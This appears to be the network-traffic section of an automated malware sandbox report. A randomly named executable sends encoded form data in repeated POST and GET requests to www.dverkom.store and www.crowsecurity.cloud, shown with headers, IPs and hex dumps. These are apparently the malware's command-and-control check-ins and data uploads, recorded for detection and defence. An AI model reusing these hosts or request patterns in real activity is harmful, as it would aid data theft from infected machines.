                                                                                                                    Nov 2, 2024 19:59:43.822289944 CET798OUTPOST /66j2/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.dverkom.store
                                                                                                                    Origin: http://www.dverkom.store
                                                                                                                    Referer: http://www.dverkom.store/66j2/
                                                                                                                    Content-Length: 200
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 4b 72 42 6a 69 41 72 69 54 34 78 67 75 77 36 4a 30 33 6a 59 49 58 66 6e 4d 35 6d 37 4a 35 36 42 50 76 38 4e 41 30 50 41 47 43 65 37 35 4c 4d 61 7a 57 2b 4a 68 43 6e 41 49 66 69 37 54 6f 4e 7a 6c 62 6e 47 62 58 35 71 33 7a 52 59 62 59 65 59 4b 6c 31 54 41 4d 68 67 6a 35 4d 57 76 6e 71 4d 67 50 73 75 7a 47 44 36 79 54 32 58 2b 35 7a 66 41 6a 6f 41 2f 42 37 6e 2b 39 33 76 77 48 6b 6c 64 44 4d 4d 59 53 4e 77 38 57 52 59 70 4f 69 4a 4d 77 4c 37 51 31 6f 32 61 47 48 4e 71 2f 67 72 77 63 70 48 65 75 6c 36 4b 43 4b 63 39 79 38 48 67 4b 62 47 52 56 51 67 6b 59 53 6e 43 6f 77 73 71 67 3d 3d
                                                                                                                    Data Ascii: InQ=KrBjiAriT4xguw6J03jYIXfnM5m7J56BPv8NA0PAGCe75LMazW+JhCnAIfi7ToNzlbnGbX5q3zRYbYeYKl1TAMhgj5MWvnqMgPsuzGD6yT2X+5zfAjoA/B7n+93vwHkldDMMYSNw8WRYpOiJMwL7Q1o2aGHNq/grwcpHeul6KCKc9y8HgKbGRVQgkYSnCowsqg==
                                                                                                                    Nov 2, 2024 19:59:44.764861107 CET375INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 02 Nov 2024 18:59:44 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    10192.168.2.44997331.31.196.17803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 19:59:46.364168882 CET818OUTPOST /66j2/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.dverkom.store
                                                                                                                    Origin: http://www.dverkom.store
                                                                                                                    Referer: http://www.dverkom.store/66j2/
                                                                                                                    Content-Length: 220
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 4b 72 42 6a 69 41 72 69 54 34 78 67 73 52 4b 4a 32 57 6a 59 64 48 66 6b 4a 35 6d 37 41 5a 36 2f 50 76 67 4e 41 31 4c 71 47 77 4b 37 2b 76 45 61 77 53 71 4a 78 53 6e 41 63 76 69 2b 4f 59 4e 38 6c 61 62 4f 62 53 35 71 33 33 42 59 62 64 79 59 4c 55 31 51 53 73 68 69 75 5a 4d 59 72 6e 71 4d 67 50 73 75 7a 43 72 63 79 54 65 58 2f 4b 37 66 41 43 6f 50 79 68 37 6b 39 39 33 76 37 6e 6b 66 64 44 4e 5a 59 58 55 6e 38 55 5a 59 70 4d 36 4a 4d 42 4c 30 4a 6c 6f 77 46 57 47 6e 68 71 4a 30 34 73 73 41 5a 39 46 44 44 42 2b 6d 78 55 74 64 78 37 36 52 44 56 30 54 35 66 62 54 50 72 4e 6c 78 6c 5a 43 35 79 33 62 36 79 50 50 65 6e 62 4f 52 68 49 51 6c 69 55 3d
                                                                                                                    Data Ascii: InQ=KrBjiAriT4xgsRKJ2WjYdHfkJ5m7AZ6/PvgNA1LqGwK7+vEawSqJxSnAcvi+OYN8labObS5q33BYbdyYLU1QSshiuZMYrnqMgPsuzCrcyTeX/K7fACoPyh7k993v7nkfdDNZYXUn8UZYpM6JMBL0JlowFWGnhqJ04ssAZ9FDDB+mxUtdx76RDV0T5fbTPrNlxlZC5y3b6yPPenbORhIQliU=
                                                                                                                    Nov 2, 2024 19:59:47.270052910 CET375INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 02 Nov 2024 18:59:47 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    11192.168.2.44998831.31.196.17803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 19:59:49.039273024 CET10900OUTPOST /66j2/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.dverkom.store
                                                                                                                    Origin: http://www.dverkom.store
                                                                                                                    Referer: http://www.dverkom.store/66j2/
                                                                                                                    Content-Length: 10300
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 4b 72 42 6a 69 41 72 69 54 34 78 67 73 52 4b 4a 32 57 6a 59 64 48 66 6b 4a 35 6d 37 41 5a 36 2f 50 76 67 4e 41 31 4c 71 47 78 79 37 2b 64 63 61 79 7a 71 4a 6a 43 6e 41 41 2f 69 2f 4f 59 4e 62 6c 62 7a 77 62 53 45 64 33 31 4a 59 61 2f 36 59 4d 67 70 51 5a 73 68 69 78 4a 4d 56 76 6e 71 46 67 50 38 69 7a 47 50 63 79 54 65 58 2f 4c 4c 66 4a 7a 6f 50 30 68 37 6e 2b 39 33 7a 77 48 6c 77 64 44 6b 69 59 54 4a 61 2f 6b 35 59 71 73 71 4a 4b 6e 6e 30 57 31 6f 79 45 57 47 2f 68 71 4e 52 34 73 77 39 5a 38 68 6c 44 47 57 6d 79 41 6f 30 67 6f 4f 4c 55 6b 42 4c 6a 65 76 75 4b 62 4e 30 6f 45 6c 6d 76 67 4c 7a 6f 7a 54 54 63 32 33 45 4a 52 63 32 2b 43 38 78 4e 4c 42 57 47 4c 68 74 47 49 54 4c 59 33 4e 56 6a 4c 66 34 33 66 38 58 6b 64 53 71 2f 48 58 42 47 76 6e 5a 6f 7a 56 7a 69 68 36 4d 39 52 74 48 68 65 58 4c 4c 2b 54 47 55 59 38 71 37 45 73 51 53 2b 30 69 2f 4b 62 33 6d 41 75 76 64 55 52 6a 52 7a 64 67 42 64 50 74 48 74 59 69 52 76 46 53 6a 32 2f 73 53 35 34 67 33 35 34 44 4f 53 76 54 5a 47 62 37 47 70 [TRUNCATED]
                                                                                                                    Data Ascii: InQ=KrBjiAriT4xgsRKJ2WjYdHfkJ5m7AZ6/PvgNA1LqGxy7+dcayzqJjCnAA/i/OYNblbzwbSEd31JYa/6YMgpQZshixJMVvnqFgP8izGPcyTeX/LLfJzoP0h7n+93zwHlwdDkiYTJa/k5YqsqJKnn0W1oyEWG/hqNR4sw9Z8hlDGWmyAo0goOLUkBLjevuKbN0oElmvgLzozTTc23EJRc2+C8xNLBWGLhtGITLY3NVjLf43f8XkdSq/HXBGvnZozVzih6M9RtHheXLL+TGUY8q7EsQS+0i/Kb3mAuvdURjRzdgBdPtHtYiRvFSj2/sS54g354DOSvTZGb7GpTVPBm4hr9e8yO9ZrroBtvRMddGzlrPrlGgCKbqNoZKQrmycWvGXD3MgVCMvYNA3Nk8KvYNp9k3z++outPWF6ydyUK//5PlqTAfZPKebtKSsEPLJiKfRUT7abhlIbx7+oCJblCkf0ZbXElM2Z8/VtNJS2LAZZhnazfoUwPy1QSXtO2OiaEGBOadRgrwXJ9ypt8nN6Hv0QqiJQYIyXf0RSdWAypgscC774RR3QT9QnkBeorjoyeqflUJ4GPoRwvbMNloFlEVlJiF0gI+NoDtuPASj2VMcmoFqJ1S7bt2h6I5r9mr8pKkS4z3mieuNq00C0lCmZhePq/AHtBdOjVnOTM9lZU3CHeFMj1TFBI3inlH0gY8c+an+DK7e55GDSYNv6sDWa+NQpbk6WW4I8Xrp6QrUasHDNWF5mXPS6rUmRzuJW1XUrHWq21mcwWHWKgpA5Nm83+hOQw8IEt3WpIyHDhu+mcn1UnqJeyx3a0fmhvZDU7J4kgpDzm+mWcah1kK4W4CtwDlSWoATZPoUkXjpr9+CTvvdVI1vWcELw3v/gi/2bnE1xKMhBmsMebsFMteWscupk5V8SXxPup9trr06V8gLTOdIYHk5l3P6DJEDZRt0U1JNSXyJrPvjRqg0PDbfyd8FgW1tPHxtkBQ80lZrg1W6IDP9/YHP83X [TRUNCATED]
                                                                                                                    Nov 2, 2024 19:59:49.988681078 CET375INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 02 Nov 2024 18:59:49 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    12192.168.2.45000331.31.196.17803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 19:59:51.637392998 CET531OUTGET /66j2/?4b0dM=fDYPF&InQ=HppDh2G+RtpfmDCc4FqHfw3lMYrNZu7sBI8zXGv7BhGUw+IQzheJ3lftE5yUT4NGt8aZPQR/20xdb9u1HnRpROVjuIMxlXfhlP5y3R3WlUeQ7oHwEkw80jU= HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.dverkom.store
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Nov 2, 2024 19:59:52.507708073 CET733INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 02 Nov 2024 18:59:52 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                                                    Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    13192.168.2.4500153.33.130.190803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 19:59:57.723486900 CET813OUTPOST /8y34/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.crowsecurity.cloud
                                                                                                                    Origin: http://www.crowsecurity.cloud
                                                                                                                    Referer: http://www.crowsecurity.cloud/8y34/
                                                                                                                    Content-Length: 200
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 61 57 64 4d 69 43 37 4a 4a 32 78 68 42 2f 6f 64 6f 7a 41 4d 34 6b 30 43 30 47 71 41 6f 79 41 37 68 51 4c 6f 5a 49 36 67 43 43 73 36 6b 33 30 4e 35 49 4d 5a 62 30 7a 6d 7a 73 6c 5a 47 4d 72 6c 33 48 54 44 6e 38 70 4a 67 2b 77 31 41 6f 61 52 4d 36 42 5a 43 7a 52 59 4f 73 37 71 78 6c 76 51 63 4b 6e 62 33 43 45 50 61 66 48 50 59 6a 7a 35 73 53 34 39 6c 38 72 36 61 37 39 64 4d 43 47 70 4e 48 6f 43 58 70 55 48 69 35 36 69 4f 4e 31 42 77 74 39 33 4a 6f 35 56 6b 78 51 79 38 31 4b 30 59 72 6c 69 64 41 75 67 66 4d 53 38 62 67 6f 47 71 37 72 31 63 56 46 66 78 71 37 36 68 49 5a 46 63 41 3d 3d
                                                                                                                    Data Ascii: InQ=aWdMiC7JJ2xhB/odozAM4k0C0GqAoyA7hQLoZI6gCCs6k30N5IMZb0zmzslZGMrl3HTDn8pJg+w1AoaRM6BZCzRYOs7qxlvQcKnb3CEPafHPYjz5sS49l8r6a79dMCGpNHoCXpUHi56iON1Bwt93Jo5VkxQy81K0YrlidAugfMS8bgoGq7r1cVFfxq76hIZFcA==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    14192.168.2.4500163.33.130.190803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:00:00.279696941 CET833OUTPOST /8y34/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.crowsecurity.cloud
                                                                                                                    Origin: http://www.crowsecurity.cloud
                                                                                                                    Referer: http://www.crowsecurity.cloud/8y34/
                                                                                                                    Content-Length: 220
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 61 57 64 4d 69 43 37 4a 4a 32 78 68 41 66 30 64 74 51 6f 4d 74 55 30 64 37 6d 71 41 69 53 42 79 68 51 33 6f 5a 4a 2b 77 58 67 34 36 6c 57 45 4e 34 4e 67 5a 4f 30 7a 6d 35 4d 6c 63 49 73 72 2b 33 48 66 4c 6e 35 52 4a 67 2b 30 31 41 73 57 52 4d 4c 42 65 44 6a 52 65 45 38 37 6b 2f 46 76 51 63 4b 6e 62 33 43 51 31 61 66 50 50 5a 54 6a 35 73 77 41 2b 73 63 72 35 64 37 39 64 49 43 47 79 4e 48 6f 67 58 72 67 39 69 36 43 69 4f 4e 46 42 77 35 6f 68 53 59 35 66 37 68 52 34 77 58 48 41 53 59 49 51 53 52 58 43 56 74 57 49 54 47 35 63 37 4b 4b 69 4f 56 68 73 73 74 79 4f 73 4c 6b 4d 48 46 45 34 69 6d 4c 68 67 4a 2f 4d 6c 76 6d 4a 72 4b 38 55 62 79 41 3d
                                                                                                                    Data Ascii: InQ=aWdMiC7JJ2xhAf0dtQoMtU0d7mqAiSByhQ3oZJ+wXg46lWEN4NgZO0zm5MlcIsr+3HfLn5RJg+01AsWRMLBeDjReE87k/FvQcKnb3CQ1afPPZTj5swA+scr5d79dICGyNHogXrg9i6CiONFBw5ohSY5f7hR4wXHASYIQSRXCVtWITG5c7KKiOVhsstyOsLkMHFE4imLhgJ/MlvmJrK8UbyA=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    15192.168.2.4500173.33.130.190803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:00:02.883326054 CET10915OUTPOST /8y34/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.crowsecurity.cloud
                                                                                                                    Origin: http://www.crowsecurity.cloud
                                                                                                                    Referer: http://www.crowsecurity.cloud/8y34/
                                                                                                                    Content-Length: 10300
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 61 57 64 4d 69 43 37 4a 4a 32 78 68 41 66 30 64 74 51 6f 4d 74 55 30 64 37 6d 71 41 69 53 42 79 68 51 33 6f 5a 4a 2b 77 58 68 41 36 6b 6b 4d 4e 36 71 30 5a 63 45 7a 6d 69 4d 6c 64 49 73 71 73 33 48 48 31 6e 35 73 72 67 38 38 31 43 50 65 52 4f 35 6c 65 4b 6a 52 65 4d 63 37 6c 78 6c 76 2f 63 4b 57 63 33 43 41 31 61 66 50 50 5a 52 72 35 72 69 34 2b 71 63 72 36 61 37 39 52 4d 43 48 64 4e 44 46 64 58 72 6b 58 69 4c 69 69 4f 70 68 42 2f 71 51 68 50 6f 35 5a 34 68 51 74 77 58 4c 66 53 5a 6c 70 53 52 79 76 56 74 69 49 52 67 41 33 72 70 4b 67 5a 57 6c 30 2f 39 32 6b 33 36 41 6e 47 47 51 46 6a 57 6a 44 33 70 4c 77 6b 64 2f 36 35 6f 6b 4e 4a 6e 46 38 61 77 4d 55 54 54 59 42 77 56 36 74 52 77 39 43 37 2b 46 75 63 5a 69 30 4b 44 4b 7a 76 63 58 77 35 76 30 6b 53 65 37 30 74 64 58 52 4c 65 65 66 48 35 33 72 6f 54 36 69 32 6b 51 51 55 65 58 64 45 65 67 50 4a 70 72 6e 36 67 36 70 39 32 6e 66 2f 4a 56 45 62 6e 68 69 30 68 63 31 66 33 76 76 75 38 6d 7a 68 57 69 47 39 61 32 57 51 72 44 5a 4e 42 6a 69 6e 44 [TRUNCATED]
                                                                                                                    Data Ascii: InQ=aWdMiC7JJ2xhAf0dtQoMtU0d7mqAiSByhQ3oZJ+wXhA6kkMN6q0ZcEzmiMldIsqs3HH1n5srg881CPeRO5leKjReMc7lxlv/cKWc3CA1afPPZRr5ri4+qcr6a79RMCHdNDFdXrkXiLiiOphB/qQhPo5Z4hQtwXLfSZlpSRyvVtiIRgA3rpKgZWl0/92k36AnGGQFjWjD3pLwkd/65okNJnF8awMUTTYBwV6tRw9C7+FucZi0KDKzvcXw5v0kSe70tdXRLeefH53roT6i2kQQUeXdEegPJprn6g6p92nf/JVEbnhi0hc1f3vvu8mzhWiG9a2WQrDZNBjinD1tHVIC6PHBSYRFi4ThtXbI5IE4doXxdO+NTW00w1oKWPyrIPkjcEuNSeSPbsCCl6y1IyYBL3dDDpcy6JjoZLVJ2I4qgwFUEOLwwbk5EZVQm9j0CgE4qUwXhWPOgHVqVNTHzzWWppDgfzDb0kpOiQWd45BQ3ylTuah+5IRdVXeKVKeJO3aJTczws9hg8n/kN+JQ139+Vzo69RKG50AR7xRh6TClUyjbk9Reb87BG3I2kiOnigTvc0lY8MCP7iG4pN2EmXvUdoQ1HMQiFhwzVs/faimXLx+/9nzRKSTsvk5BjBvdB0UWRh2ZVrV8kvxw4GCOWsJ0ohmdAXEQ+Fpduie7Fza247+NjeTsibUXqQYvpHxGjYkfoSuUzaib2UWttUblqtxxAfjbvIirT24caIGGdRglPlg8/a5QwE+p/+U8sKpdIeFeAm1NG7MDf64Lqbwn0I31XqdzVP0epqJbb9dpUIMB+M6rE8yoWfRyKRh80dO9uozV72LlOzo2+oXYtAqyo3bp+6FutYTV0Zo27jiN0aBPiGvlYplYWIJh9nW88SmYthZjzR4SApebPva05iGEq5cNTXinvfMe/yAsbZM5onjM2UgBw4NHR78WHDXdVR+NR3XShAQmPD3TkWNMjiy8C5WqRA5Ke7AVM5nHTeZ6nyTS2AS/F7H0 [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    16192.168.2.4500183.33.130.190803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:00:05.427206039 CET536OUTGET /8y34/?InQ=XU1sh1XtMideJdcjjw9tv1ce3F6q0wR2gXGwR5WASyJ1tlInyqc9ITTs981nRcft/RKcq7FVheMXMN6zJo5iOxsMANTT8niAScqb+QYTNo3dZz3Qq1EvsPg=&4b0dM=fDYPF HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.crowsecurity.cloud
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Nov 2, 2024 20:00:07.011657000 CET391INHTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Sat, 02 Nov 2024 19:00:06 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 251
                                                                                                                    Connection: close
